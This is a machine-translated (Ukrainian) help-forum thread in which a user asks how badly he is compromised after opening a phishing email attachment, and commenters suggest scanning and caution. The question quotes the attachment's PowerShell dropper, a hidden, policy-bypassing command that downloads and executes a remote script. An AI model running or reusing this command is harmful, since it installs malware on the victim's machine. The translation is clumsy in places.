Як справжній ІДІОТ, я відкрив поштовий вкладення, яке було посиланням на деталі доставки замовлення, яке я розмістив.
Усередині був короткий скрипт POWER SHELL - C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -WindowStyle прихований -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient) .DownloadString (' http://clanmeeting.com/para/pam.ps1 '));
Може хтось допоможе і скаже мені, наскільки я "Мерде".
З повагою Майк
5
Визначте, про що йдеться у відповідному сценарії, а потім на зворотній дії.
—
Рамхаунд
Отримайте гарне програмне забезпечення для Інтернет-безпеки та проведіть повне сканування. Тоді ви дізнаєтесь, як це погано. Якщо це дійсно погано, можливо, вам доведеться створити офлайн-диск для проведення аналізу.
—
AFH
Файл, який він намагався завантажити ( clanmeeting.com/para/pam.ps1 ), вже не існує. Тож ми не можемо на це поглянути, щоб сказати вам.
—
Ƭᴇcʜιᴇ007
Мені відомі абсолютно відсутні інтернет-магазини, які надсилають вам вкладення пошти, коли ви купуєте щось у них. Зазвичай вони просто надсилають вам електронну пошту квитанції, і дуже рідко надсилають вас на їхній веб-сайт для отримання більш детальної квитанції. Зробіть собі прихильність, не відкривайте випадкову прихильність, якщо ви не очікували вкладення, знайте без тіні сумнівів, хто надіслав вкладення, і сканували вкладення. Я ніколи не заражався зловмисним програмним забезпеченням, тому що не відкриваю вкладення, у мене немає абсолютно ніяких причин.
—
Рамхаунд
Мені не подобається швидкість, але я не знаю, вживаються чи ні дії.
—
Майк камінь